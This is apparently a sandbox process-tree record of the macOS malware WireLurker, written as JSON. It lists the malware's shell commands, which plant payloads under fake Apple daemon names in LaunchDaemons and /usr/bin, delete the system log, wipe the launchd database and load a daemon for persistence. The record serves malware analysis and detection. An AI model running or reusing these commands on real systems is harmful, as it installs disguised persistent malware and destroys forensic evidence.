WireLurker Process Tree

{
    "process_name": "/Users/zingo123/Downloads/WireLurker (Machook)/WireLurker", 
    "pid": 2547, 
    "command_line_args": "./WireLurker", 
    "child_processes": [
        {
            "process_name": "/bin/sh", 
            "pid": 2548, 
            "command_line_args": "/bin/sh -c unzip -o -q /tmp/release -d /tmp/;mv /tmp/94a933c449948514a3ce634663f9ccf8 /System/Library/LaunchDaemons/com.apple.appstore.plughelper.plist;mv /tmp/e6e6a7845b4e00806da7d5e264eed72b /System/Library/LaunchDaemons/com.apple.MailServiceAgentHelper.plist;mv /tmp/fd7b1215f03ed1221065ee4508d41de3 /System/Library/LaunchDaemons/com.apple.systemkeychain-helper.plist;mv /tmp/bda470f4568dae8cb12344a346a181d9 /System/Library/LaunchDaemons/com.apple.periodic-dd-mm-yy.plist;mv /tmp/dca13b4ff64bcd6876c13bbb4a22f450 /usr/bin/com.apple.MailServiceAgentHelper;mv /tmp/aa6fe189baa355a65e6aafac1e765f41 /usr/bin/periodicdate;mv /tmp/e03402006332a6e17c36e569178d2097 /usr/bin/systemkeychain-helper;mv /tmp/c4264b9607a68de8b9bbbe30436f5f28 /usr/bin/com.apple.appstore.PluginHelper;mv /tmp/dea26a823839b1b3a810d5e731d76aa2 /usr/bin/stty5.11.pl;mkdir -p /etc/manpath.d/ && unzip -o -q /tmp/dff52d100c8d69f053670a70712b0853 -d /etc/manpath.d/ && rm -rf /tmp/dff52d100c8d69f053670a70712b0853;chmod 644 /System/Library/LaunchDaemons/com.apple.MailServiceAgentHelper.plist;sleep 1;rm -f /tmp/release;rm -rf /var/log/system.log", 
            "child_processes": [
                {
                    "process_name": "/usr/bin/unzip", 
                    "pid": 2549, 
                    "command_line_args": "unzip -o -q /tmp/release -d /tmp/"
                }, 
                {
                    "process_name": "/bin/mv", 
                    "pid": 2550, 
                    "command_line_args": "mv /tmp/94a933c449948514a3ce634663f9ccf8 /System/Library/LaunchDaemons/com.apple.appstore.plughelper.plist"
                }, 
                {
                    "process_name": "/bin/mv", 
                    "pid": 2551, 
                    "command_line_args": "mv /tmp/e6e6a7845b4e00806da7d5e264eed72b /System/Library/LaunchDaemons/com.apple.MailServiceAgentHelper.plist"
                }, 
                {
                    "process_name": "/bin/mv", 
                    "pid": 2552, 
                    "command_line_args": "mv /tmp/fd7b1215f03ed1221065ee4508d41de3 /System/Library/LaunchDaemons/com.apple.systemkeychain-helper.plist"
                }, 
                {
                    "process_name": "/bin/mv", 
                    "pid": 2553, 
                    "command_line_args": "mv /tmp/bda470f4568dae8cb12344a346a181d9 /System/Library/LaunchDaemons/com.apple.periodic-dd-mm-yy.plist"
                }, 
                {
                    "process_name": "/bin/mv", 
                    "pid": 2554, 
                    "command_line_args": "mv /tmp/dca13b4ff64bcd6876c13bbb4a22f450 /usr/bin/com.apple.MailServiceAgentHelper"
                }, 
                {
                    "process_name": "/bin/mv", 
                    "pid": 2555, 
                    "command_line_args": "mv /tmp/aa6fe189baa355a65e6aafac1e765f41 /usr/bin/periodicdate"
                }, 
                {
                    "process_name": "/bin/mv", 
                    "pid": 2556, 
                    "command_line_args": "mv /tmp/e03402006332a6e17c36e569178d2097 /usr/bin/systemkeychain-helper"
                }, 
                {
                    "process_name": "/bin/mv", 
                    "pid": 2557, 
                    "command_line_args": "mv /tmp/c4264b9607a68de8b9bbbe30436f5f28 /usr/bin/com.apple.appstore.PluginHelper"
                }, 
                {
                    "process_name": "/bin/mv", 
                    "pid": 2558, 
                    "command_line_args": "mv /tmp/dea26a823839b1b3a810d5e731d76aa2 /usr/bin/stty5.11.pl"
                }, 
                {
                    "process_name": "/bin/mkdir", 
                    "pid": 2559, 
                    "command_line_args": "mkdir -p /etc/manpath.d/"
                }, 
                {
                    "process_name": "/bin/chmod", 
                    "pid": 2560, 
                    "command_line_args": "chmod 644 /System/Library/LaunchDaemons/com.apple.MailServiceAgentHelper.plist"
                }, 
                {
                    "process_name": "/bin/sleep", 
                    "pid": 2561, 
                    "command_line_args": "sleep 1"
                }, 
                {
                    "process_name": "/bin/rm", 
                    "pid": 2562, 
                    "command_line_args": "rm -f /tmp/release"
                }, 
                {
                    "process_name": "/bin/rm", 
                    "pid": 2563, 
                    "command_line_args": "rm -rf /var/log/system.log"
                }
            ]
        }, 
        {
            "process_name": "/bin/sh", 
            "pid": 2566, 
            "command_line_args": "sh -c rm -rf /var/db/launchd.db/com.apple.launchd/*;rm -rf /tmp/t.lock;/bin/launchctl load -wF /System/Library/LaunchDaemons/com.apple.MailServiceAgentHelper.plist", 
            "child_processes": [
                {
                    "process_name": "/bin/rm", 
                    "pid": 2567, 
                    "command_line_args": "rm -rf /var/db/launchd.db/com.apple.launchd/*"
                }, 
                {
                    "process_name": "/bin/rm", 
                    "pid": 2568, 
                    "command_line_args": "rm -rf /tmp/t.lock"
                }, 
                {
                    "process_name": "/bin/launchctl", 
                    "pid": 2569, 
                    "command_line_args": "/bin/launchctl load -wF /System/Library/LaunchDaemons/com.apple.MailServiceAgentHelper.plist"
                }
            ]
        }
    ]
}